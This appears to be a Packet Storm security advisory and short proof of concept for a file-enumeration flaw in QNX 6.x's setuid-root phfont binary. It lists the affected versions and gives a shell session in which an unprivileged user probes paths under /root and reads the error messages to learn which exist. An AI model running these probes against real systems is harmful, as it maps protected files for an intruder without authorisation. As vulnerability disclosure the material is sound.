QNX version 6.x suffers from an enumeration vulnerability using the setuid /usr/photon/bin/phfont binary.
6d8c2b3e86406470b2ec78792cebe88b0350304f76f4474ded0115d2baf4ab28#
# QNX 6.x phfont file and directory enumeration vulnerability by cenobyte 2014
# <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# QNX setuid root /usr/photon/bin/phfont allows any non-root user to enumerate
# files and directories as root due to PfAttachLocalDllArgv() error messages.
#
# You can discover files and directories by observing the following error
# messages and behaviour:
#
# 1) PfAttachLocalDllArgv(): Function not implemented
# A file exists.
# 2) PfAttachLocalDllArgv(): No such file or directory
# A directory does not exist.
# 3) And nothing will be returned when a directory exists.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.0
#
# - not vulnerable:
# QNX 6.3.0
$ id
uid=100(user) gid=100
$ /usr/photon/bin/phfont -A -d /root/.ph
$ /usr/photon/bin/phfont -A -d /root/doesnotexist
$ PfAttachLocalDllArgv(): No such file or directory
$ /usr/photon/bin/phfont -A -d /root/.profile
$ PfAttachLocalDllArgv(): Function not implemented
# ls -l /root
total 13
drwx------ 5 root root 1024 Jan 07 16:24 .
drwxr-xr-x 16 root root 1024 Oct 09 15:03 ..
-rw-rw-r-- 1 root root 51 Jan 24 01:15 .lastlogin
drwx------ 3 root root 1024 Sep 26 18:03 .mozilla
drwxrwxr-x 3 root root 1024 Sep 27 15:36 .ph
-rw-r--r-- 1 root root 191 Apr 20 2001 .profile
drwx------ 2 root root 1024 Sep 26 18:11 .ssh
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed